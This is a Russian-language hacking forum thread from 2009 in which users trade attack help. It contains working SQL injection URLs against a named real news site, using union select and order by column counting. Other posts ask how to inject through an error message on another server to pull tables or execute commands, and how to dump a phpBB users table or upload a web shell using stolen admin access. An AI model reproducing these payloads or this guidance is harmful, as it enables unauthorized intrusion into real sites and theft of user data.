 |
|
25.01.2009, 23:32
|
|
Новичок
Регистрация: 23.01.2009
Сообщений: 11
С нами:
9103414
Репутация:
0
|
|
Сообщение от j0ker13
2Neponomat а ключ /s не катит?)
а что это означает?
|
|
|
25.01.2009, 23:38
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
С нами:
9227224
Репутация:
60
|
|
http://www.mormontimes.com/mormon_voices/?id=3237+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32
я так понял стоит фильтрация на union?
|
|
|
|
25.01.2009, 23:47
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Код:
http://www.mormontimes.com/mormon_voices/?id=3237)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32--+
Чтобы увидеть вывод: =-3237)+union... |
|
|
|
25.01.2009, 23:54
|
|
Новичок
Регистрация: 25.01.2009
Сообщений: 1
С нами:
9101880
Репутация:
0
|
|
с чего ты взял что там 32 поля?
+order+by+ - не прокатывает
+union+ - вроде как отключен
|
|
|
|
25.01.2009, 23:57
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Сообщение от KranC
с чего ты взял что там 32 поля?
+order+by+ - не прокатывает
+union+ - вроде как отключен
Код:
http://www.mormontimes.com/mormon_voices/?id=3237)+order+by+32--+
Читайте внимательнее, сверху же l1ght написал....
Что значит "union отключен"? )))
|
|
|
|
26.01.2009, 00:09
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами:
9644006
Репутация:
3099
|
|
Сообщение от KranC
с чего ты взял что там 32 поля?
+order+by+ - не прокатывает
+union+ - вроде как отключен
методом научного тыка =\ order by 33 нет вывода а 32 есть. читаем статьи. а лучше изучить логику скл запросов.
|
|
|
|
26.01.2009, 01:58
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами:
9361870
Репутация:
58
|
|
2Neponomat чтоб добавить запись в реестр без запроса юзай так: "regedit /s 1.reg"
|
|
|
|
26.01.2009, 14:47
|
|
Новичок
Регистрация: 25.01.2009
Сообщений: 1
С нами:
9100829
Репутация:
0
|
|
Вообщем такая ситуация нарисовалась =) нашел уязвимость..но ничего не могу сделать т.е - The following SQL error occurred: The following table could not be opened.
d:\88.4.211.213\[securedir?????????]/webgene\//*{}*\\
(101)
вот что пишет ... вот это значение могу менять - //*{}*\\ ...т.е запрос типа
?p_file=//*{}*\\&
можно вывести 1001 ошибку... кто подскажет как инжект параметр туда...всё перепробовал никак не катит... ну чтобы таблицы получить или команду выполнить
Кстати да...это не PHP движок а простой хтмл ну как вы видите... или я ошибаюсь =)
|
|
|
|
26.01.2009, 14:52
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
Урлу сюда
|
|
|
|
26.01.2009, 17:25
|
|
Новичок
Регистрация: 11.01.2009
Сообщений: 15
С нами:
9121266
Репутация:
13
|
|
здравствуйте
у меня есть доступ к админке phpbb 2.0.13
мне нужно слить базу ~200 метров, но мне надо только таблу с юзерами
захожу в Backup Database, там выбираю Full backup, но сливается только 80% базы, а в конце дампа ошибка
SQL Error : 2013 Lost connection to MySQL server during query<br /><br />SHOW FIELDS FROM phpbb_ranks</br /><br />Line : 375<br />File : admin_db_utilities.php
как слить таблицу phpbb_users, или как залить шелл в phpbb 2.0.13
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
